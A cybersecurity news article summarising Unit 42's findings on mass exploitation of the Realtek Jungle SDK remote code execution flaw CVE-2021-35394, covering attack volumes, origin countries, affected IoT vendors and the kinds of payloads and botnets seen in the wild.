As of December 2022, Unit 42 researchers had observed 134 million exploit attempts leveraging this vulnerability, and around 97 of them occurred at the beginning of August 2022.
According to a new report from Palo Alto Networks’ Unit 42 researchers, between August and October 2022, cybercriminals increased their efforts to exploit a Realtek Jungle SDK vulnerability.
Usually, researchers record 10% of all attacks targeting a single vulnerability. But in this case, over 40% of all attacks involved exploitation of the Realtek remote code execution (RCE) vulnerability.
The Realtek Jungle SDK RCE is tracked as CVE-2021-35394, rated 9.8. As of December 2022, Unit 42 researchers had observed 134 million exploit attempts leveraging this vulnerability, and around 97 of them occurred at the beginning of August 2022.
This is a critical vulnerability affecting almost 190 models of devices from 66 different manufacturers.
Hackers find it useful because it can create supply-chain issues that make it difficult for users to identify the products that attackers are exploiting. It’s an arbitrary command injection and buffer overflow bug that could be leveraged to execute arbitrary code and gain the highest level of privileges, eventually hijacking the infected device appliance.
According to Unit 42’s blog post, most of the attacks observed were attempts to deliver malware and compromise vulnerable IoT devices, indicating that threat actors aim to launch large-scale attacks against internet-connected devices worldwide.
Around 50% of the attacks (48.3% to be precise) were launched from the USA, followed by Vietnam (17.8%) and Russia (14.6%). Other prominent regions include the Netherlands (7.4%), Germany (2.3%), France (6.4%), and Luxembourg (1.6%).
Moreover, 95% of the attacks targeting the vulnerability and originating from Russia were launched against Australian organizations.
Unit 42 identified three kinds of payloads that were distributed through in-the-wild exploitation of this bug. The first payload was a script that executed a shell command on the targeted server and downloaded another malware.
The second payload is an injected command that writes a binary payload to a file and executes that file. The third is an injected command that directly reboots the targeted server to launch DoS (denial of service) attacks.
Additionally, attackers can exploit this bug to deliver known botnets such as Mozi, Mirai, Gafgyt, and the new Golang-based DDoS botnet called RedGoBot.
Vulnerable IoT devices include IP cameras, routers, residential gateways, and Wi-Fi repeaters from at least 66 vendors, including Belkin, D-Link, ASUS, Huawei, LG, ZTE, Logitech, Zyxel, and NETGEAR.